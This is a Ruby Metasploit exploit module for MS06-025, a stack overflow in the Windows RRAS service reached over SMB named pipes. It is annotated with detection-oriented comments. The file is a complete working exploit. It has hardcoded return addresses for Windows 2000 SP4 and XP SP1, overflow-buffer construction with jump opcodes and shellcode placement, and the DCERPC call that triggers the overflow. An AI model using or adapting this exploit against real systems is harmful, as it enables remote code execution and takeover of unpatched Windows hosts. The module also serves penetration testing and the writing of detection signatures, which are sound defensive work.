require 'msf/core'

module Msf

# Metasploit exploit module for MS06-025, a stack overflow in the Windows
# RRAS service reached over MS-RPC on a named pipe.
#
# Detection-relevant facts visible in this module: the request goes to
# interface UUID 20610036-fa22-11cf-9823-00a0c911e5df (version 1.0) over
# ncacn_np, opnum 0x0C, and carries a fixed 0x4000-byte buffer; the pipe
# is \ROUTER by default (\SRVSVC for the XP SP1 anonymous path described
# below).  The module is marked Privileged and normally needs credentials
# (see the Description text).
class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote

  include Exploit::Remote::DCERPC
  include Exploit::Remote::SMB

  # Registers the module metadata (name, references, payload constraints,
  # per-target return addresses) and the SMBPIPE option.
  #
  # @param info [Hash] caller-supplied overrides merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft RRAS MS06-025 Overflow',
      'Description'    => %q{ This module exploits a stack overflow in the RRAS service shipped with each version of Windows. This vulnerability is not accessible to anonymous users on any platform other than Windows XP SP1. When exploiting XP SP1, 'SRVSVC' will need to be specified as the SMBPIPE parameter. },
      'Author'         => [ 'anonymous', 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'MSB', 'MS06-025'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      # Space / BadChars / StackAdjustment constrain the encoder; 0x00 is
      # excluded because the overflow data is string-like on the wire.
      'Payload'        =>
        {
          'Space'           => 1104,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      # 'Ret' is the per-service-pack address written over the saved return
      # address; it is only used for a peer that reports 2000 or XP (see exploit).
      'Targets'        =>
        [
          [ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
          [ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
        ],
      'DisclosureDate' => 'Jun 13 2006'))

    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
      ], self.class)
  end

  # Runs the exploit: SMB session, DCERPC bind to the RRAS interface, then a
  # single oversized call to opnum 0x0C.  The overflow layout is chosen by
  # matching the peer's LAN Manager string, so the request is built
  # differently for 2000 and XP.
  #
  # @raise [StandardError] any DCERPC error other than a missing response or
  #   STATUS_PIPE_DISCONNECTED, both of which are the expected outcome of a
  #   crashed service
  def exploit

    connect()
    smb_login()

    # Bind handle: RRAS interface UUID, version 1.0, named-pipe transport,
    # pipe name taken from the SMBPIPE option.
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    print_status('Getting OS...')
    # Check the remote OS name and version
    os  = smb_peer_lm
    pat = ''

    case os
    when /2000/
      # Payload first, then a 2-byte x86 short jump over the two random bytes
      # and the 4-byte return address, then a near jump back into the payload.
      pat = payload.encoded + "\xeb\x06" + Rex::Text.rand_text_alphanumeric(2) + [target.ret].pack('V') + "\xe9\xb7\xfb\xff\xff"
      os = 'Windows 2000'
    when /XP/
      # 0x4c bytes of filler precede the short jump and return address; the
      # payload follows directly after.
      pat = Rex::Text.rand_text_alphanumeric(0x4c) + "\xeb\x06" + Rex::Text.rand_text_alphanumeric(2) + [target.ret].pack('V') + payload.encoded
      os = 'Windows XP'
    end
    # NOTE(review): there is no else branch, so an unrecognised peer string
    # leaves pat empty and the call below is still made with a buffer of
    # random alphanumerics; a guard that fails early would avoid that blind
    # request against an unknown OS.

    # Two leading DWORDs, the overflow pattern, then random padding up to a
    # fixed 0x4000 bytes (the request length is therefore constant).
    req = [1, 0x49].pack('VV') + pat + Rex::Text.rand_text_alphanumeric(0x4000-pat.length)
    len = req.length
    # NDR framing around req: a 0x20000 header value, the length, the data
    # and the length again — presumably a conformant/varying buffer encoding;
    # confirm against the RRAS IDL before relying on the field meanings.
    stb = NDR.long(0x20000) + NDR.long(len) + req + NDR.long(len)

    print_status("Calling the vulnerable function on #{os}...")
    begin
      dcerpc.call(0x0C, stb)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # A missing response is expected once the service has crashed.
    rescue => e
      # A disconnected pipe is the other normal outcome; anything else is
      # a genuine error and is propagated.
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
        raise e
      end
    end

    # Cleanup handler
    disconnect
  end

end
end